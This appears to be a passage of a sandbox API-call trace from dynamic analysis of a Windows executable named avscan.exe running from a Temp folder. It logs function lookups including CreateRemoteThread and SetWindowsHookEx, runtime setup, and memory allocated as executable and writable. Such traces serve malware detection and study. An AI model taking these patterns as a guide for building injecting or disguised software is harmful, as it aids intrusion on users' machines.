GetProcAddress (hModule=0x75a80000, lpProcName="FindFirstFileW") returned 0x75a943ed [0107.956] GetProcAddress (hModule=0x75a80000, lpProcName="FileTimeToLocalFileTime") returned 0x75a9e256 [0107.956] GetProcAddress (hModule=0x75a80000, lpProcName="FileTimeToDosDateTime") returned 0x75aac845 [0107.956] GetProcAddress (hModule=0x75a80000, lpProcName="EnumCalendarInfoA") returned 0x75ab9e40 [0107.956] GetProcAddress (hModule=0x75a80000, lpProcName="DeviceIoControl") returned 0x75a931df [0107.956] GetProcAddress (hModule=0x75a80000, lpProcName="DeleteFileW") returned 0x75a9896b [0107.956] GetProcAddress (hModule=0x75a80000, lpProcName="DeleteFileA") returned 0x75a953fc [0107.957] GetProcAddress (hModule=0x75a80000, lpProcName="CreateRemoteThread") returned 0x75b1470b [0107.957] GetProcAddress (hModule=0x75a80000, lpProcName="CreateMutexA") returned 0x75a94c23 [0107.957] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileMappingW") returned 0x75a918e9 [0107.957] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileMappingA") returned 0x75a954be [0107.957] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileW") returned 0x75a93f0c [0107.957] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileA") returned 0x75a9537e [0107.957] GetProcAddress (hModule=0x75a80000, lpProcName="CreateEventA") returned 0x75a9323c [0107.957] GetProcAddress (hModule=0x75a80000, lpProcName="CreateDirectoryW") returned 0x75a94211 [0107.957] GetProcAddress (hModule=0x75a80000, lpProcName="CreateDirectoryA") returned 0x75abd516 [0107.957] GetProcAddress (hModule=0x75a80000, lpProcName="CompareStringW") returned 0x75a93b7a [0107.958] GetProcAddress (hModule=0x75a80000, lpProcName="CompareStringA") returned 0x75a93c0a [0107.958] GetProcAddress (hModule=0x75a80000, lpProcName="CloseHandle") returned 0x75a913f0 [0107.958] GetProcAddress (hModule=0x75a80000, lpProcName="IsBadStringPtrA") returned 0x75ab3143 [0107.958] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0107.958] GetProcAddress (hModule=0x75980000, lpProcName="GetKeyboardType") returned 0x759d9ac4 [0107.958] GetProcAddress (hModule=0x75980000, lpProcName="LoadStringA") returned 0x7599db21 [0107.958] GetProcAddress (hModule=0x75980000, lpProcName="MessageBoxA") returned 0x759efd1e [0107.958] GetProcAddress (hModule=0x75980000, lpProcName="CharNextA") returned 0x75997a1b [0107.958] GetProcAddress (hModule=0x75980000, lpProcName="CreateWindowExW") returned 0x75998a29 [0107.959] GetProcAddress (hModule=0x75980000, lpProcName="CreateWindowExA") returned 0x7599d22e [0107.959] GetProcAddress (hModule=0x75980000, lpProcName="WindowFromPoint") returned 0x759bed12 [0107.959] GetProcAddress (hModule=0x75980000, lpProcName="WinHelpA") returned 0x759b557f [0107.959] GetProcAddress (hModule=0x75980000, lpProcName="WaitMessage") returned 0x759bf5a9 [0107.959] GetProcAddress (hModule=0x75980000, lpProcName="VkKeyScanW") returned 0x759bfdcd [0107.959] GetProcAddress (hModule=0x75980000, lpProcName="UpdateLayeredWindow") returned 0x759aba4a [0107.960] GetProcAddress (hModule=0x75980000, lpProcName="UpdateWindow") returned 0x759a3559 [0107.960] GetProcAddress (hModule=0x75980000, lpProcName="UnregisterClassW") returned 0x75999f84 [0107.960] GetProcAddress (hModule=0x75980000, lpProcName="UnregisterClassA") returned 0x7599dced [0107.960] GetProcAddress (hModule=0x75980000, lpProcName="UnhookWindowsHookEx") returned 0x759bf52b [0107.960] GetProcAddress (hModule=0x75980000, lpProcName="TranslateMessage") returned 0x75997809 [0107.960] GetProcAddress (hModule=0x75980000, lpProcName="TranslateMDISysAccel") returned 0x759a858e [0107.961] GetProcAddress (hModule=0x75980000, lpProcName="TrackPopupMenu") returned 0x759bc288 [0107.961] GetProcAddress (hModule=0x75980000, lpProcName="SystemParametersInfoA") returned 0x759a6c30 [0107.961] GetProcAddress (hModule=0x75980000, lpProcName="ShowWindow") returned 0x759a0dfb [0107.961] GetProcAddress (hModule=0x75980000, lpProcName="ShowScrollBar") returned 0x759a4162 [0107.961] GetProcAddress (hModule=0x75980000, lpProcName="ShowOwnedPopups") returned 0x759aae86 [0107.961] GetProcAddress (hModule=0x75980000, lpProcName="ShowCursor") returned 0x759bf670 [0107.962] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowsHookExW") returned 0x759a7603 [0107.962] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowsHookExA") returned 0x759a835c [0107.962] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowTextW") returned 0x759a20ec [0107.962] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowTextA") returned 0x759a7aee [0107.962] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowPos") returned 0x75998e4e [0107.962] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowPlacement") returned 0x759a4ab6 [0107.963] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowLongW") returned 0x75998332 [0107.963] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowLongA") returned 0x759a6110 [0107.963] GetProcAddress (hModule=0x75980000, lpProcName="SetTimer") returned 0x759979fb [0107.963] GetProcAddress (hModule=0x75980000, lpProcName="SetScrollRange") returned 0x759bd50b [0107.963] GetProcAddress (hModule=0x75980000, lpProcName="SetScrollPos") returned 0x759a87a5 [0107.963] GetProcAddress (hModule=0x75980000, lpProcName="SetScrollInfo") returned 0x759a40cf [0107.963] GetProcAddress (hModule=0x75980000, lpProcName="SetRect") returned 0x759a0e1b [0107.963] GetProcAddress (hModule=0x75980000, lpProcName="SetPropA") returned 0x759a822c [0107.964] GetProcAddress (hModule=0x75980000, lpProcName="SetParent") returned 0x759a2d64 [0107.964] GetProcAddress (hModule=0x75980000, lpProcName="SetMenuItemInfoW") returned 0x759bd320 [0107.964] GetProcAddress (hModule=0x75980000, lpProcName="SetMenuItemInfoA") returned 0x759ad307 [0107.964] GetProcAddress (hModule=0x75980000, lpProcName="SetMenu") returned 0x759a2bb9 [0107.964] GetProcAddress (hModule=0x75980000, lpProcName="SetForegroundWindow") returned 0x759bf170 [0107.964] GetProcAddress (hModule=0x75980000, lpProcName="SetFocus") returned 0x759a2175 [0107.965] GetProcAddress (hModule=0x75980000, lpProcName="SetCursor") returned 0x759a41f6 [0107.965] GetProcAddress (hModule=0x75980000, lpProcName="SetClassLongA") returned 0x759ad5f9 [0107.965] GetProcAddress (hModule=0x75980000, lpProcName="SetCapture") returned 0x759bed56 [0107.965] GetProcAddress (hModule=0x75980000, lpProcName="SetActiveWindow") returned 0x759a3208 [0107.965] GetProcAddress (hModule=0x75980000, lpProcName="SendMessageW") returned 0x75999679 [0107.965] GetProcAddress (hModule=0x75980000, lpProcName="SendMessageA") returned 0x759a612e [0107.966] GetProcAddress (hModule=0x75980000, lpProcName="ScrollWindow") returned 0x759a9320 [0107.966] GetProcAddress (hModule=0x75980000, lpProcName="ScreenToClient") returned 0x759a227d [0107.966] GetProcAddress (hModule=0x75980000, lpProcName="RemovePropA") returned 0x759a8284 [0107.966] GetProcAddress (hModule=0x75980000, lpProcName="RemoveMenu") returned 0x759a7381 [0107.966] GetProcAddress (hModule=0x75980000, lpProcName="ReleaseDC") returned 0x75997446 [0107.966] GetProcAddress (hModule=0x75980000, lpProcName="ReleaseCapture") returned 0x759bed49 [0107.967] GetProcAddress (hModule=0x75980000, lpProcName="RegisterWindowMessageA") returned 0x759a0afa [0107.967] GetProcAddress (hModule=0x75980000, lpProcName="RegisterClipboardFormatA") returned 0x759a0afa [0107.967] GetProcAddress (hModule=0x75980000, lpProcName="RegisterClassW") returned 0x75998a65 [0107.967] GetProcAddress (hModule=0x75980000, lpProcName="RegisterClassA") returned 0x759a434b [0107.967] GetProcAddress (hModule=0x75980000, lpProcName="RedrawWindow") returned 0x759a140b [0107.967] GetProcAddress (hModule=0x75980000, lpProcName="PtInRect") returned 0x759a11e9 [0107.968] GetProcAddress (hModule=0x75980000, lpProcName="PostQuitMessage") returned 0x75999abb [0107.969] GetProcAddress (hModule=0x75980000, lpProcName="PostMessageW") returned 0x759a12a5 [0107.969] GetProcAddress (hModule=0x75980000, lpProcName="PostMessageA") returned 0x759a3baa [0107.969] GetProcAddress (hModule=0x75980000, lpProcName="PeekMessageA") returned 0x759a5f74 [0107.970] GetProcAddress (hModule=0x75980000, lpProcName="OffsetRect") returned 0x759a0bbd [0107.970] GetProcAddress (hModule=0x75980000, lpProcName="OemToCharA") returned 0x759f199f [0107.970] GetProcAddress (hModule=0x75980000, lpProcName="MsgWaitForMultipleObjects") returned 0x759a0b4a [0107.975] LoadLibraryA (lpLibFileName="comctl32.dll") returned 0x75410000 [0107.982] LoadLibraryA (lpLibFileName="SHFolder.dll") returned 0x75400000 [0108.088] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x1145be0 [0108.188] GetKeyboardType (nTypeFlag=0) returned 4 [0108.297] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0108.297] GetStartupInfoA (in: lpStartupInfo=0x28fe8c | out: lpStartupInfo=0x28fe8c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0108.297] GetVersion () returned 0x1db10106 [0108.297] GetVersion () returned 0x1db10106 [0108.297] GetCurrentThreadId () returned 0xfd8 [0108.453] GetModuleFileNameA (in: hModule=0x42d000, lpFilename=0x28f988, nSize=0x105 | out: lpFilename="." (normalized: "c:\\users\\keecfmwgj\\desktop\\.")) returned 0x0 [0108.454] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f863, nSize=0x105 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0108.454] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0108.454] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0108.454] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0108.454] lstrcpynA (in: lpString1=0x28f863, lpString2=".", iMaxLength=261 | out: lpString1=".") returned="." [0108.454] GetThreadLocale () returned 0x409 [0108.454] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x28f973, cchData=5 | out: lpLCData="ENU") returned 4 [0108.455] lstrlenA (lpString=".") returned 1 [0108.455] LoadStringA (in: hInstance=0x42d000, uID=0xffd6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid NULL variant operation") returned 0x1e [0108.455] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x1147708 [0108.456] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0xdf0000 [0108.456] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x1148708 [0108.456] VirtualAlloc (lpAddress=0xdf0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xdf0000 [0108.456] LoadStringA (in: hInstance=0x42d000, uID=0xffd5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0108.456] LoadStringA (in: hInstance=0x42d000, uID=0xffd3, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant or safe array is locked") returned 0x1f [0108.456] LoadStringA (in: hInstance=0x42d000, uID=0xffd4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0108.456] LoadStringA (in: hInstance=0x42d000, uID=0xffef, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Read") returned 0x4 [0108.456] LoadStringA (in: hInstance=0x42d000, uID=0xffd2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0108.456] LoadStringA (in: hInstance=0x42d000, uID=0xffee, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xffeb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Application Error") returned 0x11 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xffd1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xffd0, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Write") returned 0x5 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xffe4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xffe5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Access violation at address %p. %s of address %p") returned 0x30 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xffe6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xffe3, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xffe1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xffff, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xfffe, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xfffd, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xfffc, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xfffb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xfffa, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xfff9, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xfff8, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xfff7, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xfff6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xfff5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xfff4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="I/O error %d") returned 0xc [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xfff3, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0108.457] LoadStringA (in: hInstance=0x42d000, uID=0xfff2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid argument to date encode") returned 0x1f [0108.578] LoadStringA (in: hInstance=0x42d000, uID=0xfff0, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="'%s' is not a valid integer value") returned 0x21 [0108.578] LoadStringA (in: hInstance=0x42d000, uID=0xffe0, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0108.578] GetVersionExA (in: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x77a90362, dwMinorVersion=0x77a8e192, dwBuildNumber=0x3, dwPlatformId=0x764ea37c, szCSDVersion="\x13") | out: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0108.578] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0108.578] GetProcAddress (hModule=0x75a80000, lpProcName="GetDiskFreeSpaceExA") returned 0x75b148ef [0108.578] GetThreadLocale () returned 0x409 [0108.656] GetThreadLocale () returned 0x409 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jan") returned 4 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x28fd08, cchData=256 | out: lpLCData="January") returned 8 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Feb") returned 4 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x28fd08, cchData=256 | out: lpLCData="February") returned 9 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mar") returned 4 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="March") returned 6 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Apr") returned 4 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="April") returned 6 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jun") returned 4 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="June") returned 5 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jul") returned 4 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="July") returned 5 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Aug") returned 4 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="August") returned 7 [0108.656] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sep") returned 4 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x28fd08, cchData=256 | out: lpLCData="September") returned 10 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Oct") returned 4 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x28fd08, cchData=256 | out: lpLCData="October") returned 8 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Nov") returned 4 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x28fd08, cchData=256 | out: lpLCData="November") returned 9 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Dec") returned 4 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x28fd08, cchData=256 | out: lpLCData="December") returned 9 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sun") returned 4 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sunday") returned 7 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mon") returned 4 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Monday") returned 7 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tue") returned 4 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tuesday") returned 8 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wed") returned 4 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wednesday") returned 10 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thu") returned 4 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thursday") returned 9 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Fri") returned 4 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Friday") returned 7 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sat") returned 4 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Saturday") returned 9 [0108.657] GetThreadLocale () returned 0x409 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x28fd64, cchData=256 | out: lpLCData="$") returned 2 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=".") returned 2 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x28fd64, cchData=256 | out: lpLCData="2") returned 2 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x28fe5c, cchData=2 | out: lpLCData="/") returned 2 [0108.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x28fd64, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0108.658] GetThreadLocale () returned 0x409 [0108.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0108.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x28fd64, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0108.658] GetThreadLocale () returned 0x409 [0108.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0108.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=":") returned 2 [0108.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x28fd64, cchData=256 | out: lpLCData="AM") returned 3 [0108.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x28fd64, cchData=256 | out: lpLCData="PM") returned 3 [0108.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0108.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0108.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0108.658] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0108.734] HeapCreate (flOptions=0x0, dwInitialSize=0x88000, dwMaximumSize=0x88000) returned 0x3210000 [0108.736] RtlAllocateHeap (HeapHandle=0x3210000, Flags=0x0, Size=0x10000) returned 0x3210590 [0108.736] RtlAllocateHeap (HeapHandle=0x3210000, Flags=0x0, Size=0x10000) returned 0x3220598 [0108.736] RtlAllocateHeap (HeapHandle=0x3210000, Flags=0x0, Size=0x10000) returned 0x32305a0 [0108.736] RtlAllocateHeap (HeapHandle=0x3210000, Flags=0x0, Size=0x10000) returned 0x32405a8 [0108.737] RtlAllocateHeap (HeapHandle=0x3210000, Flags=0x0, Size=0x10000) returned 0x32505b0 [0108.737] RtlAllocateHeap (HeapHandle=0x3210000, Flags=0x0, Size=0x10000) returned 0x32605b8 [0108.737] RtlAllocateHeap (HeapHandle=0x3210000, Flags=0x0, Size=0x10000) returned 0x32705c0 [0108.737] RtlAllocateHeap (HeapHandle=0x3210000, Flags=0x0, Size=0x10000) returned 0x32805c8 [0108.742] VirtualAlloc (lpAddress=0xdf4000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x40) returned 0xdf4000 [0108.743] VirtualAlloc (lpAddress=0xdfc000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x40) returned 0xdfc000 [0108.746] VirtualAlloc (lpAddress=0xe1c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe1c000 [0108.746] VirtualAlloc (lpAddress=0xe20000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x40) returned 0xe20000 [0108.754] VirtualAlloc (lpAddress=0xe50000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe50000 [0108.755] VirtualAlloc (lpAddress=0xe54000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x40) returned 0xe54000 [0108.756] VirtualAlloc (lpAddress=0xe5c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe5c000 [0108.756] VirtualAlloc (lpAddress=0xe60000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe60000 [0108.756] VirtualAlloc (lpAddress=0xe64000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe64000 [0108.757] VirtualAlloc (lpAddress=0xe68000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe68000 [0108.758] VirtualAlloc (lpAddress=0xe6c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe6c000 [0108.758] VirtualAlloc (lpAddress=0xe70000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe70000 [0108.758] VirtualAlloc (lpAddress=0xe74000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe74000 [0108.759] VirtualAlloc (lpAddress=0xe78000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe78000 [0108.831] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x1145bf0 [0108.831] GetKeyboardType (nTypeFlag=0) returned 4 [0108.920] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0108.921] GetStartupInfoA (in: lpStartupInfo=0x28fe8c | out: lpStartupInfo=0x28fe8c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0108.922] GetVersion () returned 0x1db10106 [0108.922] GetVersion () returned 0x1db10106 [0108.922] GetCurrentThreadId () returned 0xfd8 [0109.268] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f988, nSize=0x105 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: 